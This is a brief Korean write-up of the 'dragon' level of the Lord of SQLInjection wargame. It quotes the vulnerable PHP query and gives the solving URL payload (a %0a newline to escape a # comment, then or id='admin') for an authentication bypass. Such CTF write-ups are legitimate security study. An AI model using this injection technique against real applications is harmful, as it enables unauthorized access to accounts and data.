[WriteUp]/[Lord Of SQLInjection] dragon

$query = "select id from prob_dragon where id='guest' # and pw='{$_GET[pw]}'";

→ 여기서 #은 한 줄만 주석으로 친다.

⇒ 줄을 바꿔주고 query를 작성하면 주석처리가 적용되지 않는다.

[도메인 값]?pw=%0a and pw='' or id='admin

→ %0a로 줄바꿈 처리

→ pw를 =’’로 재정의

→ 그 후 or을 이용해 id=’admin으로 지정해준다.